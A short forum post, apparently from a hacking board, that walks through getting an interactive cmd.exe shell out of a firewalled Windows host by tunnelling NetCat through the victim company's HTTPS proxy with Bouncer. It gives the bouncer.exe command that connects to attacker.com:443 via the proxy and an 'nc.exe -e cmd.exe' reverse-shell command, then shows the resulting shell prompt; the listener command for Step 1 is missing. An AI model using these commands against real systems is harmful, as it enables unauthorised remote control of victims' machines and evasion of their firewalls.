I apologize if you already know this, but to those who don't:
You can get an interactive cmd.exe shell from a firewalled host if that host has access to a HTTP Proxy server that supports HTTPS.
The tools required are the win32 ports of NetCat and Bouncer from http://nlxoo.8bit.co.uk/
In this example, attacker.com is the attacker's host, victim.company.com is the victim's host and proxy.company.com is the victim's HTTP Proxy server
Step 1:
On attacker.com, the attacker executes:
Step 2:
On victim.company.com, the attacker executes:
Code:
bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080
Step 3:
On victim.company.com, the attacker executes:
Code:
nc.exe -e cmd.exe 127.0.0.1 9999
Result:
Inside the window from Step 1, the attacker gets the shell:
Code:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\nlxoo\Desktop\test>
Note:
1) If any of the programs or connections are terminated, the shell will be lost
2) The proxy server must support HTTPS
Reply With Quote